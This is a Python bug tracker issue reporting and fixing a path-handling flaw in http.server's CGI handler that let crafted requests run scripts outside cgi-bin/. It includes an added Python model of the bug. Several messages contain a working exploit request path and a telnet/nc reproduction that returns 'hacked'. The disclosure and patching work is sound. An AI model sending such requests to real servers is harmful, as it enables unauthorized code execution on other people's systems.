Created on 2013-10-29 16:34 by Alexander.Kruppa, last changed 2022-04-11 14:57 by admin. This issue is now closed.
Files

| File name | Uploaded | Description |
|---|---|---|
| cgi.patch | benjamin.peterson, 2013-10-29 21:10 | |
| Messages (6) | |||
|---|---|---|---|
| msg201645 | Author: Alexander Kruppa (Alexander.Kruppa) | Date: 2013-10-29 16:34 | |
An error in separating the path and filename of the CGI script to run in http.server.CGIHTTPRequestHandler allows running arbitrary executables in the directory under which the server was started.
The problem is that in CGIHTTPRequestHandler we have:
    def run_cgi(self):
        """Execute a CGI script."""
        path = self.path
        dir, rest = self.cgi_info
        i = path.find('/', len(dir) + 1)
where path is the uncollapsed path in the URL, but cgi_info contains the first path segment and the rest from the *collapsed* path as filled in by is_cgi(), so indexing into path via len(dir) is incorrect.
An example exploit is giving the request path:
    ///////////badscript.sh/../cgi-bin/cgi.sh
Note that Firefox and wget at least simplify the path in the request; to make sure this exact path is used, do for example:
    (echo "GET ///////////badscript.sh/../cgi-bin/cgi.sh HTTP/1.1"; echo) | telnet localhost 4443
This causes the CGIHTTPRequestHandler to execute the badscript.sh file in the directory in which the server was started, so script execution is not restricted to the cgi-bin/ or htbin/ subdirectories.
|||
| msg201647 | Author: Christian Heimes (christian.heimes) (Python committer) | Date: 2013-10-29 16:48 | |
I can confirm the issue:

    $ mkdir www
    $ cd www
    $ cat << EOF > badscript.sh
    #!/bin/sh
    echo hacked
    EOF
    $ chmod +x badscript.sh
    $ ../python -m http.server --cgi
    $ echo "GET ///////////badscript.sh/../cgi-bin/cgi.sh HTTP/1.1" | nc localhost 8000
    HTTP/1.0 200 Script output follows
    Server: SimpleHTTP/0.6 Python/3.4.0a4+
    Date: 2013年10月29日 16:47:22 GMT
    hacked
|||
| msg201673 | Author: Benjamin Peterson (benjamin.peterson) (Python committer) | Date: 2013-10-29 21:10 | |
Patch
|||
| msg201747 | Author: Roundup Robot (python-dev) (Python triager) | Date: 2013-10-30 16:51 | |
New changeset e4fe8fcaef0d by Benjamin Peterson in branch '2.7':
use the collapsed path in the run_cgi method (closes #19435)
http://hg.python.org/cpython/rev/e4fe8fcaef0d

New changeset b1ddcb220a7f by Benjamin Peterson in branch '3.1':
use the collapsed path in the run_cgi method (closes #19435)
http://hg.python.org/cpython/rev/b1ddcb220a7f

New changeset dda1a32748e0 by Benjamin Peterson in branch '3.2':
merge 3.1 (#19435)
http://hg.python.org/cpython/rev/dda1a32748e0

New changeset 544b654d000c by Benjamin Peterson in branch '3.3':
merge 3.2 (#19435)
http://hg.python.org/cpython/rev/544b654d000c

New changeset 493a99acaf00 by Benjamin Peterson in branch 'default':
merge 3.3 (#19435)
http://hg.python.org/cpython/rev/493a99acaf00
|||
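A simplified model of the index mismatch described in the first message, and of the fix summarized in the changesets above ("use the collapsed path in the run_cgi method"). This is an added illustration, not the stdlib code or the committed patch; the helper names (`collapse`, `fs_components`, `resolve_script`) and the in-memory document root are assumptions.

```python
import posixpath

CGI_DIRECTORIES = ["/cgi-bin", "/htbin"]   # directory names from the report
DOCROOT_DIRS = {(), ("cgi-bin",)}          # constructed docroot: root and cgi-bin/ exist
# Request path quoted in the report.
REPORTED_PATH = "///////////badscript.sh/../cgi-bin/cgi.sh"

def collapse(path):
    """Simplified collapsing: drop empty and '.' segments, resolve '..'."""
    parts = []
    for seg in path.split("/"):
        if seg == "..":
            if parts:
                parts.pop()
        elif seg and seg != ".":
            parts.append(seg)
    return "/" + "/".join(parts)

def is_cgi(path):
    """Split the *collapsed* path into (dir, rest), or None if not a CGI dir."""
    collapsed = collapse(path)
    sep = collapsed.find("/", 1)
    head, tail = collapsed[:sep], collapsed[sep + 1:]
    return (head, tail) if head in CGI_DIRECTORIES else None

def fs_components(url_path):
    """Model of URL-to-filesystem translation, relative to the docroot."""
    norm = posixpath.normpath(url_path)
    return tuple(p for p in norm.split("/") if p and p not in (".", ".."))

def resolve_script(request_path, use_collapsed):
    """Return the docroot-relative file that would be run, or None."""
    info = is_cgi(request_path)
    if info is None:
        return None
    cgi_dir, rest = info
    # Reported bug: index the raw path with a length taken from the collapsed one.
    path = cgi_dir + "/" + rest if use_collapsed else request_path
    i = path.find("/", len(cgi_dir) + 1)
    while i >= 0:  # descend while the prefix is an existing directory
        nextdir, nextrest = path[:i], path[i + 1:]
        if fs_components(nextdir) not in DOCROOT_DIRS:
            break
        cgi_dir, rest = nextdir, nextrest
        i = path.find("/", len(cgi_dir) + 1)
    script = rest.split("/", 1)[0]  # query-string handling omitted
    return "/".join(fs_components(cgi_dir + "/" + script))

if __name__ == "__main__":
    for mode in (False, True):
        print("use_collapsed =", mode, "->", resolve_script(REPORTED_PATH, mode))
```

With `use_collapsed=False` the model resolves the reported path to a file outside `cgi-bin/`; with `use_collapsed=True` the index and the string it is applied to agree, and the script stays under the CGI directory.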
| msg222911 | Author: Roundup Robot (python-dev) (Python triager) | Date: 2014-07-13 05:21 | |
New changeset d367ea865ea4 by Ned Deily in branch '2.7':
Issue #21323: Fix CGIHTTPServer to again handle scripts in CGI subdirectories,
http://hg.python.org/cpython/rev/d367ea865ea4

New changeset 4de94641ba3e by Ned Deily in branch '3.2':
Issue #21323: Fix http.server to again handle scripts in CGI subdirectories,
http://hg.python.org/cpython/rev/4de94641ba3e

New changeset b957f475e41e by Ned Deily in branch '3.3':
Issue #21323: Fix http.server to again handle scripts in CGI subdirectories,
http://hg.python.org/cpython/rev/b957f475e41e

New changeset 385f4406dc26 by Ned Deily in branch '3.4':
Issue #21323: Fix http.server to again handle scripts in CGI subdirectories,
http://hg.python.org/cpython/rev/385f4406dc26

New changeset 22e5a85ba840 by Ned Deily in branch 'default':
Issue #21323: Fix http.server to again handle scripts in CGI subdirectories,
http://hg.python.org/cpython/rev/22e5a85ba840
|||
| msg222913 | Author: Ned Deily (ned.deily) (Python committer) | Date: 2014-07-13 05:34 | |
See Issue21323 for details of a problem introduced by the original fixes for this problem and now fixed (except for 3.1 which is now end-of-life).
|||
| History | |||
|---|---|---|---|
| Date | User | Action | Args |
| 2022-04-11 14:57:52 | admin | set | github: 63634 |
| 2015-10-02 00:47:18 | martin.panter | link | issue14566 superseder |
| 2014-07-13 05:34:43 | ned.deily | set | nosy: + ned.deily messages: + msg222913 |
| 2014-07-13 05:21:15 | python-dev | set | messages: + msg222911 |
| 2013-11-01 00:39:27 | Arfrever | set | nosy: + Arfrever |
| 2013-10-30 16:51:29 | python-dev | set | status: open -> closed nosy: + python-dev messages: + msg201747 resolution: fixed stage: test needed -> resolved |
| 2013-10-29 21:10:13 | benjamin.peterson | set | files: + cgi.patch keywords: + patch messages: + msg201673 |
| 2013-10-29 18:49:24 | janzert | set | nosy: + janzert |
| 2013-10-29 16:54:48 | glondu | set | nosy: + glondu |
| 2013-10-29 16:51:02 | barry | set | nosy: + barry |
| 2013-10-29 16:48:40 | christian.heimes | set | priority: normal -> release blocker assignee: christian.heimes versions: + Python 2.7, Python 3.3, Python 3.4 nosy: + larry, benjamin.peterson, georg.brandl messages: + msg201647 stage: test needed |
| 2013-10-29 16:35:41 | vstinner | set | nosy: + vstinner, christian.heimes |
| 2013-10-29 16:34:01 | Alexander.Kruppa | create | |